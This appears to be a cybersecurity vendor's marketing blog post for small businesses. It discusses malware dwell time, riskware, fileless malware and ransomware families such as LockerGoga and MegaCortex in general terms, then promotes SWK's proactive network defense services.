Need to educate your employees on cybersecurity? Download our ebook for tips on how to manage your attack surface.
The biggest cybersecurity threat to your business is not the one you can see – it is the silent breach that compromises your network without being noticed and executes on its objective only when you cannot fight back. Data security is divided between preventive and reactive controls; bypassing the former requires the patience to uncover inevitable flaws, while the obstacle of the latter relies on human action.
If your preventive controls can be compromised without being noticed, then hackers will be able to completely circumvent your reactive controls. That is the strategy that ransomware and other, more persistent forms of malware have relied on to get past defenses, yet individual and organizational perception of cybersecurity consistently remains passive. This is what puts smaller businesses lacking resources at risk, as all cybercriminals have to do is fool the system you rely on to breach your network.
Network Breach Dwell Time – Undiscovered Threats
A study of smaller and midmarket businesses by Infocyte found that SMBs consistently experienced cyber attack “dwell times” of up to 798 days of persistent malware infections. Dwell time is the period between when an infection first occurs and when it is finally detected, and can vary between attack types (Ex: ransomware exhibited an average dwell time of only 43 days according to the study). However, dwell time does not include how long it takes to actually remove the malicious files, so the lengths quoted by Infocyte should be considered the minimum expected amount of data breach response time.
Fileless Malware, Riskware & Hidden Ransomware
A significant contributing factor to the success of these attacks is the rise of different types of infection vehicles. Hackers are simultaneously leveraging existing network security gaps while deploying modified forms of malware to trick preventive antivirus controls.
An example of the former is riskware, which as illustrated by the previously cited study can go unnoticed by businesses for even longer than persistent malware. Any program that can be exploited by cybercriminals falls into this category, and can include many otherwise benign applications. Because riskware encompasses many common and non-malicious programs, it can be much harder to pick up legitimate threats, especially when relying on automated tools like antivirus software.
This is also true for the more advanced forms of malware, including the much more destructive examples of ransomware popping up lately. LockerGoga, MegaCortex, and the various targeted infections of Baltimore, Philadelphia and other cities were often proliferated by bypassing the systematized security protocols of programs like Microsoft Office, and remaining silent until they can access domain controls and begin encrypting files or even shutting out users entirely. Alternative attack methods like fileless malware rely on the same concept to get past preventive cybersecurity, which typically only seeks out traditional infection footprints to conserve time and resources.
Criminal Penetration Testing
In response to diminishing returns from mass volume cyber attacks, some skilled hackers are taking advantage of the gap between preventive and reactive network security to quietly form a new racket. It is essentially a cybercriminal’s form of penetration testing and is only notable because it goes against historical hacker methodologies of executing attacks post-breach. Instead, the perpetrator traces their steps and documents the whole process to be able to re-utilize it or sell it to other parties.
The only evidence of this emerging tactic is the eerie similarities between LockerGoga, MegaCortex, Ryuk, SamSam and other ransomware files, as well as the complete lack of a breach footprint in many infections. This trend is worrying for several reasons: it signals not only the ability and commitment to leveraging human intelligence for cybercrime, but the end results of these methods show a frightening efficiency in choosing targets of opportunity.
What adds to the danger of discreet cybercrime are the technological advancements being deployed that give hackers an edge. While AI is still getting to a place where it can perform cost-effective hacking, machine learning and other automated tools can significantly speed up the data gathering process for cybercriminals. Being able to collect intelligence faster allows hackers to act on exploits before they can be found and patched, opening up a tremendous amount of opportunities to circumvent preventive controls at their leisure.
The Best SMB Cybersecurity Solution is Human Intelligence
Hackers have recognized the weaknesses of automated security controls – so should you if you want to keep your business safe from their depredations. Organizations can no longer afford to passively wait for preventive systems to make an impact. Keeping cybercriminals from breaching your network requires a proactive approach.
Contact SWK to find out how we can improve your network defense using preemptive tactics to stop hackers in their tracks.